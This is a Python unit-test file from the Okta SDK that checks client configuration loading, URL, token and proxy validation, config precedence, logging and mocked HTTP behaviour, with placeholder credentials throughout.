tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_client.py
|
jlrgraham23/okta-sdk-python
|
5d4ffa5402b7c1739f571dffd00b205eef5e1761
|
[
"Apache-2.0"
] | null | null | null |
import aiohttp
import asyncio
import aiohttp
import logging
from aiohttp.client_reqrep import ConnectionKey
from ssl import SSLCertVerificationError
from okta.client import Client as OktaClient
import pytest
from okta.constants import FINDING_OKTA_DOMAIN
import yaml
import os
from okta.error_messages import ERROR_MESSAGE_API_TOKEN_DEFAULT, \
ERROR_MESSAGE_API_TOKEN_MISSING, ERROR_MESSAGE_AUTH_MODE_INVALID, \
ERROR_MESSAGE_CLIENT_ID_DEFAULT, ERROR_MESSAGE_CLIENT_ID_MISSING,\
ERROR_MESSAGE_ORG_URL_ADMIN, ERROR_MESSAGE_ORG_URL_MISSING, \
ERROR_MESSAGE_ORG_URL_NOT_HTTPS, ERROR_MESSAGE_ORG_URL_TYPO, \
ERROR_MESSAGE_ORG_URL_YOUROKTADOMAIN, ERROR_MESSAGE_SCOPES_PK_MISSING, \
ERROR_MESSAGE_PROXY_MISSING_HOST, ERROR_MESSAGE_PROXY_MISSING_AUTH, \
ERROR_MESSAGE_PROXY_INVALID_PORT
from okta.constants import _GLOBAL_YAML_PATH, _LOCAL_YAML_PATH
from okta.exceptions import HTTPException
from okta.http_client import HTTPClient
"""
Testing Okta Client Instantiation in different scenarios
"""
def test_constructor_user_config_empty(fs):
config = {}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_MISSING in str(exception_info.value)
assert ERROR_MESSAGE_API_TOKEN_MISSING in str(exception_info.value)
def test_constructor_user_config_url_empty():
config = {'orgUrl': '', 'token': 'TOKEN'}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_MISSING in str(exception_info.value)
def test_constructor_user_config_url_not_https():
config = {'orgUrl': 'http://test.okta.com', 'token': 'TOKEN'}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_NOT_HTTPS in str(exception_info.value)
assert FINDING_OKTA_DOMAIN in str(exception_info.value)
def test_constructor_user_config_url_has_yourOktaDomain():
config = {
'orgUrl': 'https://{yourOktaDomain}.okta.com', 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_ORG_URL_YOUROKTADOMAIN in str(exception_info.value)
@ pytest.mark.parametrize("url", ["https://dev-admin.okta.com",
"https://dev-admin.oktapreview.com",
"https://dev-admin.okta-emea.com",
"https://test-admin.okta.com"])
def test_constructor_user_config_url_has_admin(url):
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_ADMIN, f"Current value: {url}"])
def test_constructor_user_config_url_dot_com_twice():
url = 'https://test.okta.com.com'
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_TYPO, f"Current value: {url}"])
def test_constructor_user_config_url_punctuation():
# test for urls with '://' multiple times
url = 'https://://test.okta.com'
config = {
'orgUrl': url, 'token': 'TOKEN'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_ORG_URL_TYPO, f"Current value: {url}"])
def test_constructor_user_config_token_empty(fs):
config = {'orgUrl': 'https://test.okta.com', 'token': ''}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_API_TOKEN_MISSING in str(exception_info.value)
def test_constructor_user_config_url_has_apiToken(fs):
config = {
'orgUrl': 'https://test.okta.com', 'token': '{apiToken}'
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert ERROR_MESSAGE_API_TOKEN_DEFAULT in str(exception_info.value)
def test_constructor_user_config_auth_mode_invalid():
authorizationMode = "blah"
config = {'orgUrl': "https://test.okta.com",
'token': "TOKEN",
'authorizationMode': authorizationMode}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_AUTH_MODE_INVALID, f"with {authorizationMode}"])
def test_constructor_user_config_SSWS():
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url, 'token': token}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
assert 'SSWS' == loaded_config['client']['authorizationMode']
def test_constructor_user_config_Bearer():
authorizationMode = "Bearer"
org_url = "https://test.okta.com"
token = "TOKEN"
config = {'orgUrl': org_url,
'token': token,
'authorizationMode': authorizationMode}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert token == loaded_config['client']['token']
assert authorizationMode == loaded_config['client']['authorizationMode']
@ pytest.mark.parametrize("private_key", ["private key hash",
"pem_file.pem",
"{'Jwks'}"])
def test_constructor_user_config_PK(private_key):
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
client_id = "clientID"
scopes = ["scope1"]
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': client_id,
'scopes': scopes,
'privateKey': private_key
}
client = OktaClient(user_config=config)
loaded_config = client.get_config()
assert org_url == loaded_config['client']['orgUrl']
assert authorizationMode == loaded_config['client']['authorizationMode']
assert client_id == loaded_config['client']['clientId']
assert scopes == loaded_config['client']['scopes']
assert private_key == loaded_config['client']['privateKey']
def test_constructor_user_config_PK_empty(fs):
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_CLIENT_ID_MISSING, ERROR_MESSAGE_SCOPES_PK_MISSING
])
def test_constructor_user_config_PK_client_id_empty():
org_url = "https://test.okta.com"
authorizationMode = "PrivateKey"
scopes = ["scope1"]
private_key_hash = "private key hash"
config = {
'orgUrl': org_url,
'authorizationMode': authorizationMode,
'clientId': "",
'scopes': scopes,
'privateKey': private_key_hash
}
with pytest.raises(ValueError) as exception_info:
OktaClient(user_config=config)
assert all(string in str(exception_info.value) for string in [
ERROR_MESSAGE_CLIENT_ID_MISSING
])
def test_constructor_user_config_PK_client_id_default():
    """A clientId left at the placeholder value raises the default-id error."""
    config = {
        'orgUrl': "https://test.okta.com",
        'authorizationMode': "PrivateKey",
        'clientId': "{clientId}",
        'scopes': ["scope1"],
        'privateKey': "private key hash"
    }
    with pytest.raises(ValueError) as exception_info:
        OktaClient(user_config=config)
    assert ERROR_MESSAGE_CLIENT_ID_DEFAULT in str(exception_info.value)
@pytest.mark.parametrize("scopes,private_key", [([], "private key hash"),
                                                (["scope1"], ""),
                                                ([], "")])
def test_constructor_user_config_PK_scopes_and_or_private_key_empty(
        scopes,
        private_key):
    """Missing scopes and/or privateKey in PrivateKey mode raises ValueError."""
    config = {
        'orgUrl': "https://test.okta.com",
        'authorizationMode': "PrivateKey",
        'clientId': "clientID",
        'scopes': scopes,
        'privateKey': private_key
    }
    with pytest.raises(ValueError) as exception_info:
        OktaClient(user_config=config)
    assert ERROR_MESSAGE_SCOPES_PK_MISSING in str(exception_info.value)
"""
Testing constructor with YAML configurations
"""
def test_constructor_global_config_SSWS(fs):
    """SSWS settings in the global YAML config file are loaded by default."""
    # Pause the fake filesystem so the real sample file can be read.
    fs.pause()
    sample_path = os.path.join(
        os.path.dirname(__file__), "files", "SSWS-sample-global.yaml")
    with open(sample_path) as yaml_file:
        sample = yaml.load(yaml_file, Loader=yaml.SafeLoader)
    fs.resume()
    expected = sample["okta"]["client"]
    # Plant the sample at the global config path inside the fake filesystem.
    fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(sample))
    loaded = OktaClient().get_config()['client']
    assert loaded['orgUrl'] == expected["orgUrl"]
    assert loaded['token'] == expected["token"]
def test_constructor_local_config_SSWS(fs):
    """SSWS settings in the local (cwd) YAML config file are loaded by default."""
    # Pause the fake filesystem so the real sample file can be read.
    fs.pause()
    sample_path = os.path.join(
        os.path.dirname(__file__), "files", "SSWS-sample-local.yaml")
    with open(sample_path) as yaml_file:
        sample = yaml.load(yaml_file, Loader=yaml.SafeLoader)
    fs.resume()
    expected = sample["okta"]["client"]
    # Plant the sample at the local config path inside the fake filesystem.
    fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(sample))
    loaded = OktaClient().get_config()['client']
    assert loaded['orgUrl'] == expected["orgUrl"]
    assert loaded['token'] == expected["token"]
def test_constructor_global_config_PK(fs):
    """Private-key settings in the global YAML config file are loaded."""
    # Pause the fake filesystem so the real sample file can be read.
    fs.pause()
    sample_path = os.path.join(
        os.path.dirname(__file__), "files", "PK-sample-global.yaml")
    with open(sample_path) as yaml_file:
        sample = yaml.load(yaml_file, Loader=yaml.SafeLoader)
    fs.resume()
    expected = sample["okta"]["client"]
    # Plant the sample at the global config path inside the fake filesystem.
    fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(sample))
    loaded = OktaClient().get_config()['client']
    assert loaded['orgUrl'] == expected["orgUrl"]
    assert loaded['clientId'] == expected["clientId"]
    assert loaded['privateKey'] == expected["privateKey"]
def test_constructor_local_config_PK(fs):
    """Private-key settings in the local (cwd) YAML config file are loaded."""
    # Pause the fake filesystem so the real sample file can be read.
    fs.pause()
    sample_path = os.path.join(
        os.path.dirname(__file__), "files", "PK-sample-local.yaml")
    with open(sample_path) as yaml_file:
        sample = yaml.load(yaml_file, Loader=yaml.SafeLoader)
    fs.resume()
    expected = sample["okta"]["client"]
    # Plant the sample at the local config path inside the fake filesystem.
    fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(sample))
    loaded = OktaClient().get_config()['client']
    assert loaded['orgUrl'] == expected["orgUrl"]
    assert loaded['clientId'] == expected["clientId"]
    assert loaded['privateKey'] == expected["privateKey"]
def test_constructor_env_vars_SSWS():
    """SSWS credentials are picked up from OKTA_CLIENT_* environment variables.

    Fix: env vars are now removed in a ``finally`` block so a failure inside
    client construction cannot leak them into subsequent tests (the original
    cleaned up only on the success path).
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    os.environ["OKTA_CLIENT_ORGURL"] = org_url
    os.environ["OKTA_CLIENT_TOKEN"] = token
    try:
        client = OktaClient()
        loaded_config = client.get_config()
    finally:
        os.environ.pop("OKTA_CLIENT_ORGURL", None)
        os.environ.pop("OKTA_CLIENT_TOKEN", None)
    assert org_url == loaded_config['client']['orgUrl']
    assert token == loaded_config['client']['token']
def test_constructor_env_vars_PK():
    """PrivateKey settings are read from OKTA_CLIENT_* environment variables.

    OKTA_CLIENT_SCOPES is a comma-separated string that the client must split
    into a list. Fix: env vars are now removed in a ``finally`` block so a
    failure inside client construction cannot leak them into subsequent tests
    (the original popped them only on the success path).
    """
    env_settings = {
        "OKTA_CLIENT_AUTHORIZATIONMODE": "PrivateKey",
        "OKTA_CLIENT_ORGURL": "https://test.okta.com",
        "OKTA_CLIENT_CLIENTID": "clientID",
        "OKTA_CLIENT_SCOPES": "scope1,scope2,scope3",
        "OKTA_CLIENT_PRIVATEKEY": "private key",
    }
    os.environ.update(env_settings)
    try:
        loaded_config = OktaClient().get_config()
    finally:
        for name in env_settings:
            os.environ.pop(name, None)
    client_config = loaded_config['client']
    assert client_config['authorizationMode'] == env_settings["OKTA_CLIENT_AUTHORIZATIONMODE"]
    assert client_config['orgUrl'] == env_settings["OKTA_CLIENT_ORGURL"]
    assert client_config['clientId'] == env_settings["OKTA_CLIENT_CLIENTID"]
    # The comma-separated scopes string must come back as a list.
    assert client_config['scopes'] == env_settings["OKTA_CLIENT_SCOPES"].split(',')
    assert client_config['privateKey'] == env_settings["OKTA_CLIENT_PRIVATEKEY"]
def test_constructor_precedence_highest_rank_local_yaml(fs):
    """A local okta.yaml outranks the global one when both are present."""
    def load_sample(name):
        # Pause the fake filesystem so the real sample file can be read.
        fs.pause()
        path = os.path.join(os.path.dirname(__file__), "files", name)
        with open(path) as sample_file:
            data = yaml.load(sample_file, Loader=yaml.SafeLoader)
        fs.resume()
        return data
    # Setup Global config
    global_config = load_sample("SSWS-sample-global.yaml")
    fs.create_file(_GLOBAL_YAML_PATH, contents=yaml.dump(global_config))
    # Setup Local config
    local_config = load_sample("SSWS-sample-local.yaml")
    fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
    global_client = global_config["okta"]["client"]
    local_client = local_config["okta"]["client"]
    # Create client and validate values
    loaded = OktaClient().get_config()['client']
    assert loaded['orgUrl'] == local_client["orgUrl"]
    assert loaded['token'] == local_client["token"]
    # The two samples must actually differ for the precedence check to mean anything.
    assert local_client["orgUrl"] != global_client["orgUrl"]
    assert local_client["token"] != global_client["token"]
    assert loaded['orgUrl'] != global_client["orgUrl"]
    assert loaded['token'] != global_client["token"]
def test_constructor_precedence_highest_rank_env_vars(fs):
    """Environment variables outrank a local okta.yaml config file.

    Fix: env vars are now removed in a ``finally`` block so a failure inside
    client construction cannot leak them into subsequent tests (the original
    popped them only on the success path).
    """
    # Setup Local config
    fs.pause()
    local_sample = os.path.join(os.path.dirname(
        __file__), "files", "SSWS-sample-local.yaml")
    with open(local_sample) as file:
        local_config = yaml.load(file, Loader=yaml.SafeLoader)
        local_org_url = local_config["okta"]["client"]["orgUrl"]
        local_token = local_config["okta"]["client"]["token"]
    fs.resume()
    fs.create_file(_LOCAL_YAML_PATH, contents=yaml.dump(local_config))
    # Setup env. vars
    env_org_url = "https://test.env.okta.com"
    env_token = "envTOKEN"
    os.environ["OKTA_CLIENT_ORGURL"] = env_org_url
    os.environ["OKTA_CLIENT_TOKEN"] = env_token
    try:
        client = OktaClient()
        loaded_config = client.get_config()
    finally:
        os.environ.pop("OKTA_CLIENT_ORGURL", None)
        os.environ.pop("OKTA_CLIENT_TOKEN", None)
    # Env values win; local YAML values must not appear in the loaded config.
    assert local_org_url != loaded_config['client']['orgUrl']
    assert local_token != loaded_config['client']['token']
    assert local_org_url != env_org_url
    assert local_token != env_token
    assert env_org_url == loaded_config['client']['orgUrl']
    assert env_token == loaded_config['client']['token']
def test_constructor_precedence_highest_rank_user_config():
    """An explicit user config outranks environment variables.

    Fix: env vars are now removed in a ``finally`` block so a failure inside
    client construction cannot leak them into subsequent tests (the original
    popped them only on the success path).
    """
    # Setup env. vars
    env_org_url = "https://test.env.okta.com"
    env_token = "envTOKEN"
    os.environ["OKTA_CLIENT_ORGURL"] = env_org_url
    os.environ["OKTA_CLIENT_TOKEN"] = env_token
    # Setup user config
    user_org_url = "https://test.user.okta.com"
    user_token = "userTOKEN"
    config = {'orgUrl': user_org_url, 'token': user_token}
    try:
        client = OktaClient(config)
        loaded_config = client.get_config()
    finally:
        os.environ.pop("OKTA_CLIENT_ORGURL", None)
        os.environ.pop("OKTA_CLIENT_TOKEN", None)
    # User config wins; env values must not appear in the loaded config.
    assert user_org_url == loaded_config['client']['orgUrl']
    assert user_token == loaded_config['client']['token']
    assert user_org_url != env_org_url
    assert user_token != env_token
    assert env_org_url != loaded_config['client']['orgUrl']
    assert env_token != loaded_config['client']['token']
def test_constructor_valid_proxy():
    """A fully-specified proxy config produces a http://user:pass@host:port/ URL."""
    proxy_settings = {
        'port': 8080,
        'host': "test.okta.com",
        'username': "username",
        'password': "password"
    }
    config = {
        'orgUrl': "https://test.okta.com",
        'token': "TOKEN",
        'proxy': proxy_settings
    }
    # Ensure no error is raised and the proxy URL is assembled correctly.
    client = OktaClient(user_config=config)
    expected = "http://{username}:{password}@{host}:{port}/".format(**proxy_settings)
    assert client.get_request_executor()._http_client._proxy == expected
def test_constructor_valid_no_proxy():
    """Without a proxy section, the HTTP client's proxy stays None."""
    client = OktaClient(user_config={'orgUrl': "https://test.okta.com",
                                     'token': "TOKEN"})
    assert client.get_request_executor()._http_client._proxy is None
def test_constructor_valid_env_vars():
    """HTTP(S)_PROXY environment variables are honored with no proxy config.

    The test asserts that HTTPS_PROXY is the one picked for an https org URL.
    Fix: env vars are now removed in a ``finally`` block so a constructor
    failure cannot leak proxy settings into subsequent tests (the original
    deleted them only on the success path).
    """
    config = {
        'orgUrl': "https://test.okta.com",
        'token': "TOKEN"
    }
    # Setting up env vars
    os.environ["HTTP_PROXY"] = "http://user:pass@test.okta.com:8080"
    os.environ["HTTPS_PROXY"] = "https://user:pass@test.okta.com:8080"
    expected = os.environ["HTTPS_PROXY"]
    try:
        client = OktaClient(user_config=config)
    finally:
        os.environ.pop('HTTP_PROXY', None)
        os.environ.pop('HTTPS_PROXY', None)
    # Ensure no error is raised and the HTTPS proxy value was selected.
    assert client.get_request_executor(
    )._http_client._proxy == expected
def test_constructor_invalid_missing_host():
    """A proxy config with no 'host' key must raise ValueError.

    Bug fix: the original asserted ``MSG in exception_info.value`` — membership
    against the ValueError object itself, which raises ``TypeError: argument of
    type 'ValueError' is not iterable``. The message must be checked against
    ``str(exception_info.value)``, as the other tests in this file do.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    port = 8080
    username = "username"
    password = "password"
    config = {
        'orgUrl': org_url,
        'token': token,
        'proxy': {
            'port': port,
            'username': username,
            'password': password
        }
    }
    # Expect error with config
    with pytest.raises(ValueError) as exception_info:
        OktaClient(user_config=config)
    assert ERROR_MESSAGE_PROXY_MISSING_HOST in str(exception_info.value)
@pytest.mark.parametrize("username,password", [("", "password"),
                                               ("username", "")])
def test_constructor_invalid_missing_username_or_password(username, password):
    """A proxy config missing either credential must raise ValueError.

    Bug fix: the original asserted ``MSG in exception_info.value`` — membership
    against the ValueError object itself, which raises ``TypeError``. The
    message must be checked against ``str(exception_info.value)``.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    port = 8080
    host = "test.okta.com"
    config = {
        'orgUrl': org_url,
        'token': token,
        'proxy': {
            'port': port,
            'host': host,
            'username': username,
            'password': password
        }
    }
    # Expect error with config
    with pytest.raises(ValueError) as exception_info:
        OktaClient(user_config=config)
    assert ERROR_MESSAGE_PROXY_MISSING_AUTH in str(exception_info.value)
@pytest.mark.parametrize("port", [-1, 0, 65536, "port"])
def test_constructor_invalid_port_number(port):
    """Out-of-range or non-numeric proxy ports must raise ValueError.

    Bug fix: the original asserted ``MSG in exception_info.value`` — membership
    against the ValueError object itself, which raises ``TypeError``. The
    message must be checked against ``str(exception_info.value)``.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    host = "test.okta.com"
    username = "username"
    password = "password"
    config = {
        'orgUrl': org_url,
        'token': token,
        'proxy': {
            'port': port,
            'host': host,
            'username': username,
            'password': password
        }
    }
    # Expect error with config
    with pytest.raises(ValueError) as exception_info:
        OktaClient(user_config=config)
    assert ERROR_MESSAGE_PROXY_INVALID_PORT in str(exception_info.value)
def test_constructor_custom_http_client_impl():
    """A user-supplied HTTPClient subclass becomes the executor's HTTP client."""
    class CustomHTTPClient(HTTPClient):
        pass
    client = OktaClient({'orgUrl': "https://test.okta.com",
                         'token': "TOKEN",
                         'httpClient': CustomHTTPClient})
    assert isinstance(client._request_executor._http_client, CustomHTTPClient)
def test_constructor_client_logging():
    """The 'logging' config section enables and configures the SDK logger."""
    logger = logging.getLogger('okta-sdk-python')
    # The SDK logger must start out disabled before any client enables it.
    assert logger.disabled
    # Constructing the client with logging enabled flips the logger on.
    OktaClient({'orgUrl': "https://test.okta.com",
                'token': "TOKEN",
                'logging': {"enabled": True, "logLevel": logging.DEBUG}})
    assert not logger.disabled
    assert logger.level == logging.DEBUG
def test_client_raise_exception():
    """With raiseException enabled, API errors surface as HTTPException."""
    settings = {'orgUrl': "https://test.okta.com",
                'token': "TOKEN",
                'raiseException': True}
    client = OktaClient(settings)
    with pytest.raises(HTTPException):
        asyncio.run(client.list_users())
def test_client_custom_headers(monkeypatch, mocker):
    """Custom headers survive set/get, appear on outgoing requests, and clear.

    aiohttp.ClientSession.request is monkeypatched with a recording stub, so
    no real HTTP traffic occurs.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    config = {'orgUrl': org_url, 'token': token}
    custom_headers = {'Header-Test-1': 'test value 1',
                      'Header-Test-2': 'test value 2'}
    client = OktaClient(config)
    # verify custom headers are set
    client.set_custom_headers(custom_headers)
    assert client.get_custom_headers() == custom_headers
    # mock http requests, verify if custom header is present in request
    class MockHTTPRequest():
        # Stands in for aiohttp's request call: records the call kwargs and
        # acts as an async context manager yielding a response-like self.
        def __call__(self, **params):
            self.request_info = params
            self.headers = params['headers']
            self.url = params['url']
            self.content_type = 'application/json'
            self.links = ''
            self.text = MockHTTPRequest.mock_response_text
            self.status = 200
            return self
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            return '[{"text": "mock response text"}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    asyncio.run(client.list_users())
    # The recorded request headers must include the custom entries.
    assert 'Header-Test-1' in mock_http_request.headers
    assert 'Header-Test-2' in mock_http_request.headers
    # verify custom headers are cleared
    client.clear_custom_headers()
    assert client.get_custom_headers() == {}
def test_client_handle_aiohttp_error(monkeypatch, mocker):
    """A connection-level aiohttp error is returned as the error element of
    the (response, body, error) triple rather than being raised; response and
    body come back as None.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    config = {'orgUrl': org_url, 'token': token}
    client = OktaClient(config)
    class MockHTTPRequest():
        # Simulates a TLS certificate-verification failure on every request.
        def __call__(self, **params):
            raise aiohttp.ClientConnectorCertificateError(
                ConnectionKey(host=org_url,
                              port=443,
                              is_ssl=True,
                              ssl=None,
                              proxy=None,
                              proxy_auth=None,
                              proxy_headers_hash=None),
                SSLCertVerificationError(1,
                                         '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: '
                                         'unable to get local issuer certificate (_ssl.c:1123)'))
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            return '[{"text": "mock response text"}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    res, resp_body, error = asyncio.run(client.list_users())
    # The SDK must swallow the aiohttp exception and hand it back as `error`.
    assert res is None
    assert resp_body is None
    assert isinstance(error, aiohttp.ClientError)
def test_client_log_debug(monkeypatch, caplog):
    """With logging enabled at DEBUG, request details are emitted to the
    'okta-sdk-python' logger. aiohttp is monkeypatched so no network I/O occurs.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    config = {'orgUrl': org_url, 'token': token,
              'logging': {'enabled': True, 'logLevel': logging.DEBUG}}
    client = OktaClient(config)
    class MockHTTPRequest():
        # Stands in for aiohttp's request call: records the call kwargs and
        # acts as an async context manager yielding a response-like self.
        def __call__(self, **params):
            self.request_info = params
            self.headers = params['headers']
            self.url = params['url']
            self.content_type = 'application/json'
            self.links = ''
            self.text = MockHTTPRequest.mock_response_text
            self.status = 200
            return self
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            # Canned single-user JSON payload for list_users().
            return '[{"embedded": null,' \
                   '"links": {"self": {"href": "https://test.okta.com/v1/users/test_id"}},' \
                   '"activated": "2021-01-01T00:00:00.000Z",' \
                   '"created": "2021-01-01T00:00:00.000Z",' \
                   '"credentials": null,' \
                   '"id": "test_id",' \
                   '"last_login": null,' \
                   '"profile": {"name": "test_name"},' \
                   '"status": null,' \
                   '"status_changed": null,' \
                   '"transitioning_to_status": null,' \
                   '"type": null}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    with caplog.at_level(logging.DEBUG):
        res, resp_body, error = asyncio.run(client.list_users())
        # DEBUG output must name the logger and include the request details.
        assert 'okta-sdk-python' in caplog.text
        assert 'DEBUG' in caplog.text
        assert "'method': 'GET'" in caplog.text
        assert "'url': 'https://test.okta.com/api/v1/users'" in caplog.text
def test_client_log_info(monkeypatch, caplog):
    """With the log level raised to INFO, a successful request produces no
    log output (the request-detail records are below INFO).
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    config = {'orgUrl': org_url, 'token': token,
              'logging': {'enabled': True, 'logLevel': logging.INFO}}
    client = OktaClient(config)
    class MockHTTPRequest():
        # Stands in for aiohttp's request call: records the call kwargs and
        # acts as an async context manager yielding a response-like self.
        def __call__(self, **params):
            self.request_info = params
            self.headers = params['headers']
            self.url = params['url']
            self.content_type = 'application/json'
            self.links = ''
            self.text = MockHTTPRequest.mock_response_text
            self.status = 200
            return self
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            # Canned single-user JSON payload for list_users().
            return '[{"embedded": null,' \
                   '"links": {"self": {"href": "https://test.okta.com/v1/users/test_id"}},' \
                   '"activated": "2021-01-01T00:00:00.000Z",' \
                   '"created": "2021-01-01T00:00:00.000Z",' \
                   '"credentials": null,' \
                   '"id": "test_id",' \
                   '"last_login": null,' \
                   '"profile": {"name": "test_name"},' \
                   '"status": null,' \
                   '"status_changed": null,' \
                   '"transitioning_to_status": null,' \
                   '"type": null}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    with caplog.at_level(logging.INFO):
        res, resp_body, error = asyncio.run(client.list_users())
        # Nothing at INFO or above is logged for a clean request.
        assert caplog.text == ''
def test_client_log_exception(monkeypatch, caplog):
    """Connection failures are logged when logging is enabled at DEBUG."""
    org_url = "https://test.okta.com"
    token = "TOKEN"
    config = {'orgUrl': org_url, 'token': token,
              'logging': {'enabled': True, 'logLevel': logging.DEBUG}}
    client = OktaClient(config)
    class MockHTTPRequest():
        # Simulates a TLS certificate-verification failure on every request.
        def __call__(self, **params):
            raise aiohttp.ClientConnectorCertificateError(
                ConnectionKey(host=org_url,
                              port=443,
                              is_ssl=True,
                              ssl=None,
                              proxy=None,
                              proxy_auth=None,
                              proxy_headers_hash=None),
                SSLCertVerificationError(1,
                                         '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: '
                                         'unable to get local issuer certificate (_ssl.c:1123)'))
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            return '[{"text": "mock response text"}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    with caplog.at_level(logging.DEBUG):
        res, resp_body, error = asyncio.run(client.list_users())
        # The connection error's message must reach the log output.
        assert 'Cannot connect to host https://test.okta.com' in caplog.text
def test_client_ssl_context(monkeypatch, mocker):
    """An sslContext object from the user config is forwarded to aiohttp
    as the 'ssl_context' request parameter.
    """
    org_url = "https://test.okta.com"
    token = "TOKEN"
    mock_ssl_context = mocker.MagicMock()
    config = {'orgUrl': org_url, 'token': token, 'sslContext': mock_ssl_context}
    client = OktaClient(config)
    # mock http requests, verify if custom header is present in request
    class MockHTTPRequest():
        # Stands in for aiohttp's request call: records the call kwargs and
        # acts as an async context manager yielding a response-like self.
        def __call__(self, **params):
            self.request_info = params
            self.headers = params['headers']
            self.url = params['url']
            self.content_type = 'application/json'
            self.links = ''
            self.text = MockHTTPRequest.mock_response_text
            self.status = 200
            return self
        async def __aenter__(self):
            return self
        async def __aexit__(self, exc_type, exc, tb):
            pass
        @staticmethod
        async def mock_response_text():
            return '[{"text": "mock response text"}]'
    mock_http_request = MockHTTPRequest()
    monkeypatch.setattr(aiohttp.ClientSession, 'request', mock_http_request)
    asyncio.run(client.list_users())
    # The exact sslContext instance must appear in the recorded request kwargs.
    assert mock_http_request.request_info['ssl_context'] == mock_ssl_context
@pytest.mark.asyncio
async def test_client_session(mocker):
    """A session only exists when the client is used as an async context manager."""
    base_config = {'orgUrl': "https://test.okta.com", 'token': "TOKEN"}
    # Constructing a client directly leaves the HTTP client's session unset.
    plain_client = OktaClient(base_config)
    assert plain_client._request_executor._http_client._session is None
    # Entering the async context opens a real aiohttp.ClientSession.
    async with OktaClient(dict(base_config)) as managed_client:
        session = managed_client._request_executor._http_client._session
        assert isinstance(session, aiohttp.ClientSession)
| 34.631175
| 103
| 0.638499
| 3,606
| 31,549
| 5.307266
| 0.07127
| 0.031038
| 0.048908
| 0.028425
| 0.843348
| 0.793709
| 0.751489
| 0.7181
| 0.705873
| 0.68492
| 0
| 0.005813
| 0.242131
| 31,549
| 910
| 104
| 34.669231
| 0.794605
| 0.02092
| 0
| 0.701681
| 0
| 0.002801
| 0.172911
| 0.014537
| 0
| 0
| 0
| 0
| 0.123249
| 1
| 0.065826
| false
| 0.026611
| 0.021008
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c83a9ab7932e617abbf9c97070c6a218dfe2f8
| 153,611
|
py
|
Python
|
